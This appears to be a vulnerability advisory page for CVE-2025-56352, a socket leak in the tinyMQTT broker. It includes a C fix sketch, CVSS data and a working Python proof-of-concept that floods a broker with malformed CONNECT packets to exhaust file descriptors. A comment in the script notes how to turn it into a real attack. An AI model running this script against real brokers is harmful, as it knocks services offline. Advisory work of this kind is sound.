Security Vulnerability Report
CVE-2025-56352 CVSS 7.5 HIGH

CVE-2025-56352

Published: 2026-05-18 16:16:29
Last Modified: 2026-05-18 20:27:23

Description

In tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18), the broker mishandles protocol violations during CONNECT packet parsing. When receiving a CONNECT packet with a zero-length Client ID while CleanSession is set to 0, the broker correctly replies with a CONNACK return code 0x02 (Identifier Rejected) but fails to explicitly close the TCP connection. Since the surrounding connection teardown logic is not guaranteed to execute, each such invalid CONNECT attempt leaves the underlying socket open. Repeated attempts cause server-side resource exhaustion due to accumulating file descriptors and memory usage, potentially resulting in denial of service.
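The reply-then-close handling that the description says is missing, as an added sketch in C; it is not tinyMQTT's code, and `connect_return_code` and `handle_connect` are hypothetical names. MQTT 3.1.1 requires the server to close the network connection after sending CONNACK 0x02, so the handler releases the descriptor itself instead of relying on later teardown.

```c
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

enum { CONNACK_ACCEPTED = 0x00, CONNACK_BAD_PROTO = 0x01, CONNACK_ID_REJECTED = 0x02 };

/* Return the CONNACK code for one complete CONNECT packet, or -1 when the
 * packet is malformed and the connection is dropped without a reply.
 * Simplified: one-byte Remaining Length, payload after Client ID not parsed. */
int connect_return_code(const uint8_t *p, size_t n)
{
    if (n < 14 || p[0] != 0x10 || (p[1] & 0x80) || (size_t)p[1] + 2 != n)
        return -1;
    if (memcmp(p + 2, "\x00\x04MQTT", 6) != 0) return -1;
    if (p[8] != 0x04) return CONNACK_BAD_PROTO;   /* only level 4 (3.1.1) */
    if (p[9] & 0x01) return -1;                   /* reserved flag bit must be 0 */
    int clean_session = (p[9] >> 1) & 1;
    size_t id_len = ((size_t)p[12] << 8) | p[13];
    if (14 + id_len > n) return -1;
    if (id_len == 0 && !clean_session) return CONNACK_ID_REJECTED;
    return CONNACK_ACCEPTED;
}

/* Hypothetical handler: sends the CONNACK, then closes fd itself on every
 * outcome except acceptance. Returns 1 if fd was closed, 0 if it stays open. */
int handle_connect(int fd, const uint8_t *p, size_t n)
{
    int rc = connect_return_code(p, n);
    if (rc >= 0) {
        uint8_t connack[4] = { 0x20, 0x02, 0x00, (uint8_t)rc };
        if (send(fd, connack, sizeof connack, 0) != (ssize_t)sizeof connack)
            rc = -1;                              /* peer gone: still release fd */
    }
    if (rc == CONNACK_ACCEPTED) return 0;
    close(fd);   /* reply first, then release the descriptor */
    return 1;
}

int main(void)
{
    /* Constructed sample: CleanSession=0 with a zero-length Client ID */
    const uint8_t pkt[] = { 0x10, 0x0C, 0, 4, 'M', 'Q', 'T', 'T', 4, 0, 0, 60, 0, 0 };
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0) return 1;
    int closed = handle_connect(sv[0], pkt, sizeof pkt);
    close(sv[1]);
    return closed ? 0 : 1;
}
```

A regression test for a fixed broker can assert the same observable behaviour from the client side: CONNACK bytes `20 02 00 02` followed by end-of-stream on the socket.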

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import time

# Target configuration
TARGET_IP = "127.0.0.1"
TARGET_PORT = 1883
COUNT = 1000


def create_malicious_packet():
    """
    Creates a CONNECT packet with CleanSession=0 and Zero-length Client ID.
    This violates the MQTT protocol but triggers the resource leak in tinyMQTT.
    """
    # Fixed Header: Message Type CONNECT (1), Reserved (0) -> 0x10
    header = bytes([0x10])

    # Variable Header
    protocol_name = b'\x00\x04MQTT'  # Protocol Name: MQTT
    protocol_level = bytes([0x04])   # Protocol Level: 4 (3.1.1)
    # Connect Flags: 0x00 (Clean Session = 0)
    connect_flags = bytes([0x00])
    keep_alive = b'\x00\x3C'         # Keep Alive: 60

    # Payload
    # Client Identifier Length: 0x0000 (Zero length)
    client_id_len = b'\x00\x00'
    client_id = b''
    payload = client_id_len + client_id

    # Remaining Length calculation
    # Protocol Name (6) + Level (1) + Flags (1) + Keep Alive (2) + Payload (2) = 12
    remaining_length = bytes([0x0C])

    return header + remaining_length + protocol_name + protocol_level + connect_flags + keep_alive + payload


print(f"[*] Starting DoS attack against {TARGET_IP}:{TARGET_PORT}...")
print("[!] This will attempt to exhaust file descriptors.")

sockets = []
packet = create_malicious_packet()

try:
    for i in range(COUNT):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1)
        try:
            s.connect((TARGET_IP, TARGET_PORT))
            s.send(packet)
            # Do not close the socket! This consumes the file descriptor.
            sockets.append(s)
            print(f"[+] Sent packet {i+1}, socket left open.")
        except Exception as e:
            print(f"[-] Failed at iteration {i+1}: {e}")
            break
except KeyboardInterrupt:
    print("\n[!] Stopping attack.")
finally:
    # Cleanup sockets for testing purposes (comment out for actual DoS)
    for s in sockets:
        s.close()
    print("[*] Sockets closed.")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56352", "sourceIdentifier": "[email protected]", "published": "2026-05-18T16:16:29.130", "lastModified": "2026-05-18T20:27:23.023", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18), the broker mishandles protocol violations during CONNECT packet parsing. When receiving a CONNECT packet with a zero-length Client ID while CleanSession is set to 0, the broker correctly replies with a CONNACK return code 0x02 (Identifier Rejected) but fails to explicitly close the TCP connection. Since the surrounding connection teardown logic is not guaranteed to execute, each such invalid CONNECT attempt leaves the underlying socket open. Repeated attempts cause server-side resource exhaustion due to accumulating file descriptors and memory usage, potentially resulting in denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://github.com/JustDoIt0910/tinyMQTT/issues/19", "source": "[email protected]"}, {"url": "https://github.com/user-attachments/files/21207896/Resource_Exhaustion_Poc.txt", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}